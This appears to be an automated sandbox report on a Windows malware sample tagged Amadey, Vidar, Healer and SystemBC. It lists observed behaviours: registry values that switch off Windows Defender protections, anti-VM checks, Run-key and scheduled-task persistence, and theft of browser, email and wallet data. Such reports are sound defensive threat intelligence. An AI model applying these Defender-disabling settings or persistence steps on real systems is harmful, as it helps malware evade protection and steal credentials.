Malware Analysis Report

2025-04-03 09:10

Sample ID 250224-qxpaqavny2
Target f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5
SHA256 f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5
Tags
amadey gcleaner healer systembc vidar 9c9aa5 a4d2cd credential_access defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan
score
10/10

Analysis Overview

Threat Level: Known bad

The file f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5 was found to be: Known bad.

Malicious Activity Summary

SystemBC

Modifies Windows Defender notification settings

Vidar

Healer

Modifies Windows Defender Real-time Protection settings

Modifies Windows Defender DisableAntiSpyware settings

Detects Healer, an antivirus disabler dropper

Amadey

Gcleaner family

GCleaner

Modifies Windows Defender TamperProtection settings

Vidar family

Healer family

Detect Vidar Stealer

Amadey family

Systembc family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Uses browser remote debugging

Downloads MZ/PE file

Windows security modification

Reads user/profile data of web browsers

Checks BIOS information in registry

Reads data files stored by FTP clients

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of local email clients

Identifies Wine through registry keys

Checks computer location settings

Unsecured Credentials: Credentials In Files

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Adds Run key to start application

AutoIT Executable

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Unsigned PE

Program crash

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Checks processor information in registry

Modifies system certificate store

Modifies Internet Explorer settings

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-24 13:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-24 13:38

Reported

2025-02-24 13:41

Platform

win7-20240903-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer, an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\rwhkbvh\apitlt.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\rwhkbvh\apitlt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\rwhkbvh\apitlt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
N/A N/A C:\ProgramData\rwhkbvh\apitlt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\ProgramData\rwhkbvh\apitlt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\dbf56223ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\dbf56223ab.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\rwhkbvh\apitlt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
